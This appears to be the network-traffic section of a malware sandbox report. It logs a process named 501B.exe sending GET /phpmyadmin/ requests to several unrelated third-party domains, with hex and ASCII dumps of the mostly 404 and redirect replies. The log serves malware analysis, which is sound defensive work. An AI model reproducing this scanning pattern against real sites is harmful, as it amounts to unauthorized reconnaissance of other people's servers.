                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                7192.168.2.65170964.71.33.31443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                8192.168.2.65145181.31.35.504433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC170INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: close
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                9192.168.2.65146081.31.35.504433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC170INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: close
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                10192.168.2.651432178.172.160.194433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC167OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ext.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC221INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6f 73 74 65 72 2e 62 79 2f 0d 0a 53 65 72 76 65 72 3a 20 68 6f 73 74 65 72 20 47 75 61 72 64 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sat, 02 Dec 2023 01:09:14 GMTContent-Type: text/htmlContent-Length: 169Connection: closeLocation: https://hoster.by/Server: hoster GuardX-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                11192.168.2.6514623.33.130.1904433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                12192.168.2.651429188.120.236.184433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC179INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 35 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 31 20 44 65 63 20 32 30 32 33 20 32 32 3a 30 39 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:24 GMTConnection: closeContent-Length: 1245
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC1245INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                13192.168.2.65196966.115.173.188443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:31 UTC616INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 36 36 39 35 35 64 65 30 36 65 61 66 37 35 65 31 33 64 32 39 33 38 62 63 64 65 66 62 31 66 39 36 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeset-cookie: PHPSESSID=66955de06eaf75e13d2938bcdefb1f96; path=/; securepragma: no-cachecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-reva


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                14192.168.2.65142785.255.14.184433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC177INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 2e 30 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 02 Dec 2023 01:09:25 GMTConnection: closeContent-Length: 315
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                15192.168.2.65209185.255.14.18443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC177INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 2e 30 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 02 Dec 2023 01:09:25 GMTConnection: closeContent-Length: 315
